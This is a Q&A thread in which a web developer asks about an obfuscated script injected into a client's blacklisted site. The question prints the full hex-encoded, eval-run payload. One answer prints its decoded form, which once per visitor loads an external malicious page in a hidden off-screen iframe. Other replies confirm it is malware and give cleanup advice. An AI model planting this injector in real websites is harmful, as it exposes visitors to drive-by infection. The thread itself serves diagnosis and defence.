# what is this script?malware?

Tags: web, malware, blacklist

I developed a site about a year and half ago.It is very basic and simple html and little javascript.But all of sudden client informed me that his site is black-listed and in google it is showing that "may harm your computer..." msg.I looked into website's view source and noticed some additional scripts are there.I upgraded it to html5 and asked him to delete all previous files and put new files.That's worked fine and made it clear from being black-listed.just now out of curiosity I checked the site, upon visiting a "url not found" message is appearing in one corner,(for the first time only) and in source there are some additional scripts like before.I just copied it form source.

```
sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:71:62:64:5f:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:71:62:64:5f:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:71:62:64:5f:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:69:60:5c:6b:58:6d:58:6a:25:5a:66:64:26:4d:6e:71:5d:69:5e:44:42:25:67:5f:67:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2b:27:2d:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2b:27:2d:67:6f:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2b:27:2d:67:6f:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2b:27:2d:1e:32:4:1:17:71:62:64:5f:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2b:27:2d:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:71:62:64:5f:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:71:62:64:5f:53:1e:17:5a:63:58:6a:6a:34:53:1e:71:62:64:5f:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:71:62:64:5f:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:71:62:64:5f:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:71:62:64:5f:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");}w=f;s=[];for(i=22-20-2;-i+1406!=0;i+=1){j=i;if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);}ht=eval;ht(s)}
```

I don't have idea what is this?Is it some malware or what?If it is a some kind of malware, what should I do and how to prevent it?I am afraid if it going to be blacklisted again.

Any idea or advice would be greatly appreciated
Thanks in advance

Comment: Looks like site's been compromised.. Have a look at this (almost) same: http://stackoverflow.com/questions/16264707/opencart-ajax-json-response-unknown-characters

Comment: @vidario Thanks for your reply...what to do next?how to prevent it from keep happening?

Answer (score 1):

Confirmed it to be malware - see link below. Seems to be a compromised admin password. First change that.

Is it a Wordpress site? I've heard good things about [Better WP security plugin](http://wordpress.org/plugins/better-wp-security/) but I'm not too familiar with it.

If not Wordpress - seeing as you say "simple html, little javascript" check for SQL injection possibilities in any forms, etc., change FTP password.

Good luck!

[Limeworks.org malware - Threat Report](http://ninjafirewall.com/malware/index.php?threat=2013-06-18.01)

Comment: Thank you so much for the reference.seems like same kind of code.BTW It is not a wordpress site.

Answer (score 0):

after deobfuscation, this is the code you got:

```
function zkmh09() {
 var static='ajax';
 var controller='index.php';
 var zkmh = document.createElement('iframe');

 zkmh.src = 'http://rietavas.com/VwzfrgMK.php';
 zkmh.style.position = 'absolute';
 zkmh.style.color = '406';
 zkmh.style.height = '406px';
 zkmh.style.width = '406px';
 zkmh.style.left = '1000406';
 zkmh.style.top = '1000406';

 if (!document.getElementById('zkmh')) {
 document.write('<p id=\'zkmh\' class=\'zkmh09\' ></p>');
 document.getElementById('zkmh').appendChild(zkmh);
 }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zkmh09();
}
}
```

as you can see it creates an iframe element and send an ajax requests to http://ri***vas.com/Vwz***MK.php page. also it has two other function to set and get cookies.